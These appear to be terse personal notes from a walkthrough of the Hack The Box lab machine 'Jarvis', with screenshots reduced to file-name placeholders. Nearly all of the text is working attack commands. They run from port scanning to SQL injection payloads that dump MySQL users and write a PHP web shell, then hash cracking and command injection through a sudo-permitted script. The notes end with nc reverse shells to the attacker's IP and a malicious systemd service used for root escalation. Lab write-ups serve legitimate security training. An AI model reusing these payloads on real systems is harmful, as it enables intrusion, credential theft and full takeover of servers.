echo "10.129.203.177 jarvis.htb" | sudo tee -a /etc/hosts

nmap -p- --open -T5 -v -n 10.129.203.177

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.203.177 -oG allPorts

extractPorts allPorts

nmap -sCV -p80,443 10.129.203.177 -oN targeted

Pasted image 20210826143718.png

Pasted image 20210826143945.png

http://10.129.203.177/room.php?cod=0%20UNION%20SELECT%201,version(),3,4,5,6,7
http://10.129.203.177/room.php?cod=0%20UNION%20SELECT%201,group_concat(user,0x3a,file_priv),3,4,5,6,7%20from%20mysql.user

Pasted image 20210826144751.png

Pasted image 20210826144835.png

Pasted image 20210826145119.png

Pasted image 20210826145156.png

Pasted image 20210826145728.png

Pasted image 20210826145832.png

Pasted image 20210826150740.png

Pasted image 20210826152523.png

http://10.129.203.177/room.php?cod=0%20UNION%20SELECT%201,%22%3C?php %20echo%20system($_REQUEST[%27test%27]);%20?%3E%22,3,4,5,6,7%20into %20outfile%20%27/var/www/html/shell.php%27

Pasted image 20210826153245.png

hashcat --examples-hashes | grep -i "sha1"

hashcat -m 300 -a 0 hash /usr/share/wordlists/rockyou.txt

nmap --script http-enum -p80 10.129.203.177 -oN ../nmap/webScan

Pasted image 20210827122609.png

Corremos LinEnum.sh

Pasted image 20210827115443.png

sudo -l

Pasted image 20210827122107.png

python simpler.py -p

Pasted image 20210827121958.png

'10.10.14.125'

Pasted image 20210827122050.png

nc -lvnp 443

echo "nc -e /bin/sh 10.10.14.125 443" > /tmp/shell.sh

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

Pasted image 20210827122216.png

$(bash /tmp/shell.sh)

nc -lvnp 443

Pasted image 20210827122436.png

echo '[Service] 
>Type=notify 
>ExecStart=/bin/sh -c "nc -e /bin/bash 10.10.14.125 443" 
>KillMode=process >Restart=on-faillure 
>RestartSec=42s 
>[Install] 
>WantedBy=multi-user.target' > new.service 
systemctl link /home/pepper/new.service
systemctl start new

Pasted image 20210827122708.png

nc -lvnp 443

Pasted image 20210827122816.png

